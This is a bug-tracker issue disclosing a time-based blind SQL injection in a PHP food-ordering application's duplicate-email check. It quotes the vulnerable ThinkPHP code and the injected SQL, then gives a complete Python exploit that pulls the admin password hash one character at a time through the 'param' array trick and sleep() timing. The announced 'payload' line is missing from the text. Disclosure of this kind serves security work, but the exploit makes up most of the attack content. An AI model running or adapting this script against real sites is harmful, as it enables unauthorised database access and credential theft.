A Time-based blind SQL Injection in email check #11

Open
StefanoWen opened this issue Jan 17, 2019 · 0 comments

When registering a new account, it verifies whether the email address is already in use.

web/Lib/Action/PublicAction.class.php

	// duplicate-email check
	public function checkemail(){
		$Member=M('Members');
		// $_POST["param"] is used as-is: when it arrives as an array, ThinkPHP's
		// where() reads it as array('exp', <raw sql>) and splices the fragment
		// into the WHERE clause unescaped.
		$data['useremail']=$_POST["param"];
		$reuseremail=$Member->where($data)->select();
		if(empty($reuseremail)) {
			echo '{
				"info":"",
				"status":"y"
			}';
		}
		else{
			// info: "This email is already registered, please use another one!"
			echo '{
				"info":"该邮箱已注册,请更换其他邮箱!",
				"status":"n"
			}';
		}
	}

We can bypass the SQL filter using this payload:

The final SQL statement would be

SELECT * FROM `sn_members` WHERE (  (`useremail` and sleep(5))  ) 

And here is the exploit to obtain the admin's password hash:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-

import requests
from string import ascii_letters, digits
from time import time

url = "http://127.0.0.1/waimai/index.php?m=public&a=checkemail"

userpass = ''
for i in range(99):
    found = False
    for j in ascii_letters + digits:
        # param[0]="exp" makes ThinkPHP's where() splice param[1] into the SQL verbatim.
        # 0x61646d696e is 'admin'. count(*)=1 gives IF() a clean boolean: the raw hash
        # string would be cast to a number and read as 0 whenever it starts with a
        # letter or '0', so the sleep() would never fire for most hashes.
        data = {"param[0]": "exp",
                "param[1]": "and if((select count(*) from sn_members "
                            "where username=0x61646d696e and userpass like BINARY '{}%')=1,sleep(2),1)"
                            .format(userpass + j),
                "name": "useremail"}

        start_time = time()
        requests.post(url=url, data=data)
        if time() - start_time > 2:  # delayed response: the guessed prefix is correct
            userpass += j
            print(userpass)
            found = True
            break
    if not found:  # no character matched this position: the hash is complete
        break